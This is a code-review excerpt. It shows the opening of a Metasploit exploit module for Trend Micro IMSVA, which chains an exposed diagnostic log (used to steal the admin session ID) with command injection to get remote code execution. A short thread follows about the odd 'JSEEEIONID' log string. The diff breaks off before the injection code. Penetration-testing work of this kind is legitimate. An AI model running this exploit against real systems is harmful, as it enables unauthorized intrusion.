modules/exploits/linux/http/trendmicro_imsva_widget_exec.rb

```diff
@@ -0,0 +1,123 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution",
+      'Description'    => %q{
+        This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a
+        terminal command under the context of the web server user.
+
+        The specific flaw exists within the management interface, which listens on TCP port 443 by default. Trend Micro IMSVA product
+        have widget feature which is implemented with PHP. Insecurely configured web server exposes diagnostic.log file, which
+        leads to an extraction of JSESSIONID value from administrator session. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process
+        does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities,
+        unauthenticated users can execute a terminal command under the context of the web server user.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'mr_me <mr_me@offensive-security.com>', # author of command injection
+          'Mehmet Ince <mehmet@mehmetince.net>' # author of authentication bypass & msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://pentest.blog/one-ring-to-rule-them-all-same-rce-on-multiple-trend-micro-products/'],
+          ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-17-521/'],
+        ],
+      'DefaultOptions'  =>
+        {
+          'SSL' => true,
+          'RPORT' => 8445
+        },
+      'Platform'       => ['python'],
+      'Arch'           => ARCH_PYTHON,
+      'Targets'        => [[ 'Automatic', {}]],
+      'Privileged'     => false,
+      'DisclosureDate' => "Oct 7 2017",
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI of the Trend Micro OfficeScan management interface', '/'])
+      ]
+    )
+  end
+
+  def extract_jsessionid
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'widget', 'repository', 'log', 'diagnostic.log')
+    })
+    if res && res.code == 200 && res.body.include?('JSEEEIONID')
```

Comment:
Did you mean `JSESSIONID`?

Reply:
looking at my log file right now, it is `JSEEEIONID`

Reply:
wat